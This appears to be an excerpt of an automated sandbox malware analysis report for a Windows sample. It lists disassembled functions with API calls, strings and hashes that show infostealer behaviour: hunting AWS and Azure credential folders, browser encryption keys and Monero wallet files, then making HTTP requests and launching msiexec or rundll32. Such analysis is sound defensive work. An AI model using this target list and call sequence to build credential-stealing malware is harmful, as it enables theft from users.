                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: d0f841b43524ffd22c268bac0752694c3440fdbf2e9287b6ab220cf960b30327
                  • Instruction ID: 2a47844f3d9675a3a94eff3cf530f7a35e1548cb5b7f2bf95893ac14981c15f2
                  • Opcode Fuzzy Hash: d0f841b43524ffd22c268bac0752694c3440fdbf2e9287b6ab220cf960b30327
                  • Instruction Fuzzy Hash: F8E1DF71910108ABDB18FBA8DC95FEEB778FF14300F40416AF516A6192EF346A46CB63
                  Function 00888320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • RegOpenKeyExA.ADVAPI32(00000000,015DB140,00000000,00020019,00000000,008905B6), ref: 008883A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00888426
                  • wsprintfA.USER32 ref: 00888459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0088847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0088848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00888499
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 5850a4c1f7037398e0d965bc4b91d478391ee2fcc065e335152f69a7e96c9fa4
                  • Instruction ID: a560273a0b27b70ba5cac6afcf0fe60ae610328c39a0dc6dc868a3a379c57ae3
                  • Opcode Fuzzy Hash: 5850a4c1f7037398e0d965bc4b91d478391ee2fcc065e335152f69a7e96c9fa4
                  • Instruction Fuzzy Hash: A8813D71910118ABEB28EB54CC95FEA77B8FF18700F4082D9E109E6191DF756B86CFA1
                  Function 00884D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00888DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00888E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00884DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00884DCD
                    • Part of subcall function 00884910: wsprintfA.USER32 ref: 0088492C
                    • Part of subcall function 00884910: FindFirstFileA.KERNEL32(?,?), ref: 00884943
                  • lstrcat.KERNEL32(?,00000000), ref: 00884E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00884E59
                    • Part of subcall function 00884910: StrCmpCA.SHLWAPI(?,00890FDC), ref: 00884971
                    • Part of subcall function 00884910: StrCmpCA.SHLWAPI(?,00890FE0), ref: 00884987
                    • Part of subcall function 00884910: FindNextFileA.KERNEL32(000000FF,?), ref: 00884B7D
                    • Part of subcall function 00884910: FindClose.KERNEL32(000000FF), ref: 00884B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00884EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00884EE5
                    • Part of subcall function 00884910: wsprintfA.USER32 ref: 008849B0
                    • Part of subcall function 00884910: StrCmpCA.SHLWAPI(?,008908D2), ref: 008849C5
                    • Part of subcall function 00884910: wsprintfA.USER32 ref: 008849E2
                    • Part of subcall function 00884910: PathMatchSpecA.SHLWAPI(?,?), ref: 00884A1E
                    • Part of subcall function 00884910: lstrcat.KERNEL32(?,015DE410), ref: 00884A4A
                    • Part of subcall function 00884910: lstrcat.KERNEL32(?,00890FF8), ref: 00884A5C
                    • Part of subcall function 00884910: lstrcat.KERNEL32(?,?), ref: 00884A70
                    • Part of subcall function 00884910: lstrcat.KERNEL32(?,00890FFC), ref: 00884A82
                    • Part of subcall function 00884910: lstrcat.KERNEL32(?,?), ref: 00884A96
                    • Part of subcall function 00884910: CopyFileA.KERNEL32(?,?,00000001), ref: 00884AAC
                    • Part of subcall function 00884910: DeleteFileA.KERNEL32(?), ref: 00884B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: 9dcd9eb85f7dc592085d77eae5caef92482a30a0fcfaad942b16afd905625675
                  • Instruction ID: eb93dabd15b28caf7c069d4ff9c2a20892ad26ba9d83bd1e278efaf857f3f023
                  • Opcode Fuzzy Hash: 9dcd9eb85f7dc592085d77eae5caef92482a30a0fcfaad942b16afd905625675
                  • Instruction Fuzzy Hash: 6241937A94420467DF14F7A0EC8BFE93238FB24700F004594B259E61C2EEB95B898B93
                  Function 00889010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0088906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: 0bcf7d77467c786d2d3c3841dc3cc4452a3145eb2a801c99431dc02db5824395
                  • Instruction ID: b822a428a7cc26897dd1b631b6fcfe3665a3457f07a4dbb7aebb295f626d51f2
                  • Opcode Fuzzy Hash: 0bcf7d77467c786d2d3c3841dc3cc4452a3145eb2a801c99431dc02db5824395
                  • Instruction Fuzzy Hash: FE71FCB5910208ABDB04EBE4DC89FEDB7B9FF58700F148608F515E7291DB34A945CB61
                  Function 00882E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 008831C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 0088335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 008834EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 24e3c71012521eed7c88a731d9348c10f0c177b702acb8fe09d7c59bce1c8485
                  • Instruction ID: daaa66ca6184e802bcb08985240e21bb5be24e968122f08ab3de2e33351bb5a2
                  • Opcode Fuzzy Hash: 24e3c71012521eed7c88a731d9348c10f0c177b702acb8fe09d7c59bce1c8485
                  • Instruction Fuzzy Hash: D112DC718001189AEB19FBA4DD92EDDB778FF14300F50416AE506A61D2EF382B4ACF63
                  Function 008852C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 00876280: InternetOpenA.WININET(00890DFE,00000001,00000000,00000000,00000000), ref: 008762E1
                    • Part of subcall function 00876280: StrCmpCA.SHLWAPI(?,015DE4A0), ref: 00876303
                    • Part of subcall function 00876280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00876335
                    • Part of subcall function 00876280: HttpOpenRequestA.WININET(00000000,GET,?,015DDD58,00000000,00000000,00400100,00000000), ref: 00876385
                    • Part of subcall function 00876280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008763BF
                    • Part of subcall function 00876280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008763D1
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00885318
                  • lstrlen.KERNEL32(00000000), ref: 0088532F
                    • Part of subcall function 00888E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00888E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00885364
                  • lstrlen.KERNEL32(00000000), ref: 00885383
                  • lstrlen.KERNEL32(00000000), ref: 008853AE
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: dc283220d42f7f2b1e94ddbd319b9422fd54c732b3948273566e8916ce5bf8fd
                  • Instruction ID: 897f6d52fafec4b4bcda26ce9ca47b3c29efa733c186213efcc7e5c6945f611d
                  • Opcode Fuzzy Hash: dc283220d42f7f2b1e94ddbd319b9422fd54c732b3948273566e8916ce5bf8fd
                  • Instruction Fuzzy Hash: BB51CB709101499BEB18FF68C996AED7779FF50300F504029E40ADA5D2EF386B46DBA3
                  Function 008812D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 5f88d24c312aed08593b7aad40eee8d267fea33eb172329565d2ff4055abd22e
                  • Instruction ID: 5401260c5da297be346dd3f01caa4dd71f06bc6803a8bb17ffdc995acd2d8407
                  • Opcode Fuzzy Hash: 5f88d24c312aed08593b7aad40eee8d267fea33eb172329565d2ff4055abd22e
                  • Instruction Fuzzy Hash: 2FC197B59001199BCB18FFA4DC89FEA7378FB64304F004599F50AE7192DB74AA85CF92
                  Function 00884280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00888DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00888E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 008842EC
                  • lstrcat.KERNEL32(?,015DDC80), ref: 0088430B
                  • lstrcat.KERNEL32(?,?), ref: 0088431F
                  • lstrcat.KERNEL32(?,015DCE80), ref: 00884333
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 00888D90: GetFileAttributesA.KERNEL32(00000000,?,00871B54,?,?,0089564C,?,?,00890E1F), ref: 00888D9F
                    • Part of subcall function 00879CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00879D39
                    • Part of subcall function 008799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008799EC
                    • Part of subcall function 008799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00879A11
                    • Part of subcall function 008799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00879A31
                    • Part of subcall function 008799C0: ReadFile.KERNEL32(000000FF,?,00000000,0087148F,00000000), ref: 00879A5A
                    • Part of subcall function 008799C0: LocalFree.KERNEL32(0087148F), ref: 00879A90
                    • Part of subcall function 008799C0: CloseHandle.KERNEL32(000000FF), ref: 00879A9A
                    • Part of subcall function 008893C0: GlobalAlloc.KERNEL32(00000000,008843DD,008843DD), ref: 008893D3
                  • StrStrA.SHLWAPI(?,015DDDB8), ref: 008843F3
                  • GlobalFree.KERNEL32(?), ref: 00884512
                    • Part of subcall function 00879AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879AEF
                    • Part of subcall function 00879AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00874EEE,00000000,?), ref: 00879B01
                    • Part of subcall function 00879AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879B2A
                    • Part of subcall function 00879AC0: LocalFree.KERNEL32(?,?,?,?,00874EEE,00000000,?), ref: 00879B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 008844A3
                  • StrCmpCA.SHLWAPI(?,008908D1), ref: 008844C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 008844D2
                  • lstrcat.KERNEL32(00000000,?), ref: 008844E5
                  • lstrcat.KERNEL32(00000000,00890FB8), ref: 008844F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 9b2aedd6ece52b1e38616b94fe7049e5482a8ad1bb450e67f4df297ccbb234e6
                  • Instruction ID: 7b3f3ee4ba2ed77e80c93d85bd412737c8e39e583d3f039e09016da59ca58002
                  • Opcode Fuzzy Hash: 9b2aedd6ece52b1e38616b94fe7049e5482a8ad1bb450e67f4df297ccbb234e6
                  • Instruction Fuzzy Hash: 1F713376900208ABDB14FBE4DC85FEE7779FB58300F048598E609D6192EA34DB45CB92
                  Function 00871310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 008712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008712B4
                    • Part of subcall function 008712A0: RtlAllocateHeap.NTDLL(00000000), ref: 008712BB
                    • Part of subcall function 008712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008712D7
                    • Part of subcall function 008712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008712F5
                    • Part of subcall function 008712A0: RegCloseKey.ADVAPI32(?), ref: 008712FF
                  • lstrcat.KERNEL32(?,00000000), ref: 0087134F
                  • lstrlen.KERNEL32(?), ref: 0087135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00871377
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 00888B60: GetSystemTime.KERNEL32(00890E1A,015D9C18,008905AE,?,?,008713F9,?,0000001A,00890E1A,00000000,?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 00888B86
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00871465
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008799EC
                    • Part of subcall function 008799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00879A11
                    • Part of subcall function 008799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00879A31
                    • Part of subcall function 008799C0: ReadFile.KERNEL32(000000FF,?,00000000,0087148F,00000000), ref: 00879A5A
                    • Part of subcall function 008799C0: LocalFree.KERNEL32(0087148F), ref: 00879A90
                    • Part of subcall function 008799C0: CloseHandle.KERNEL32(000000FF), ref: 00879A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 008714EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
